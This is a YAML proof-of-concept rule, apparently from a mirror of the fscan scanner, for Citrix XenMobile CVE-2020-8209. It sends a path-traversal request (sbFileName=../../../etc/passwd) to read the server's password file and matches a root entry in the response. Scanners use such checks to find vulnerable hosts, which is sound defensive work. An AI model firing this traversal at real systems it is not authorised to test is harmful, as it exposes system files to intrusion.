mirror of https://github.com/qwqdanchun/fscan.git
12 lines
422 B
YAML
12 lines
422 B
YAML
name: poc-yaml-citrix-xenmobile-cve-2020-8209
|
|
rules:
|
|
- method: GET
|
|
path: /jsp/help-sb-download.jsp?sbFileName=../../../etc/passwd
|
|
follow_redirects: false
|
|
expression: |
|
|
response.status == 200 && response.content_type.contains("octet-stream") && "^root:[x*]:0:0:".bmatches(response.body)
|
|
detail:
|
|
author: B1anda0(https://github.com/B1anda0)
|
|
links:
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2020-8209
|